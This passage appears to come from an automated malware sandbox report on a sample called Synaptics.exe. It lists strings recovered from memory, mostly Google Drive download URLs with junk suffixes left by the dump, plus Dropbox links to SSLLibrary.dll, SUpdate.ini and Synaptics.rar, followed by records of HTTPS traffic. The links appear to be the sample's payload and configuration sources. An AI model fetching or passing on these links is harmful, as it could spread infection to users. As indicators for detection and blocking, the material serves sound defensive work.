                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=/;
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=O
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?;
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH-UA
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE7
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadET
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG9
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGRtJGx
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH1j
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHCon
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJSTUV
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1398475623.0000000000978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMX
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRhI8&
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                          Source: Synaptics.exe, 00000004.00000003.1398475623.0000000000967000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWAQ
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWXYZ%
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWw
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_/Dri
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada6g
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadancis
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadciscoKI
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadconte
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcuritG
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:#f
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd:#ffu
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddRt9s
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddir=l
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddsour
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeI
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfo
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.c
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhe
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadinfo.d
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadir=lt
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000964000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado563
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoads.
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorm-f
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp/cspP
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpis.c
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                          Source: Synaptics.exe, 00000004.00000002.1605825740.0000000000925000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                          Source: Synaptics.exe, 00000004.00000003.1433165329.00000000051C5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.cn
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:390px;min-height:180px;
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtrRAz3
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadve
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005211000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.00000000051A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                          Source: MSID754.tmp.2.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000094E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/urity
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                          Source: Synaptics.exe, 00000004.00000003.1433165329.0000000005209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000096F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/PIZfSVlVsOGlEVGxuZVk&export=downloadh
                          Source: Synaptics.exe, 00000004.00000002.1607238068.00000000051A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                          Source: Synaptics.exe, 00000004.00000003.1435428385.0000000000986000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                          Source: Synaptics.exe, 00000004.00000003.1435428385.0000000000986000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPm4H
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPm4r
                          Source: Synaptics.exe, 00000004.00000003.1435428385.0000000000986000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.1605825740.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000098D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                          Source: Synaptics.exe, 00000004.00000003.1435428385.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                          Source: Synaptics.exe, 00000004.00000002.1605825740.000000000090A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                          Source: Synaptics.exe, 00000004.00000002.1607238068.0000000005160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/v
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
                          Source: MSID754.tmp.2.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                          Source: MSID754.tmp.2.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                          Source: MSID754.tmp, 00000003.00000003.1336948973.0000000002340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlX
                          Source: MSID754.tmp.2.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                          Source: Synaptics.exe, 00000004.00000002.1606313975.0000000002240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
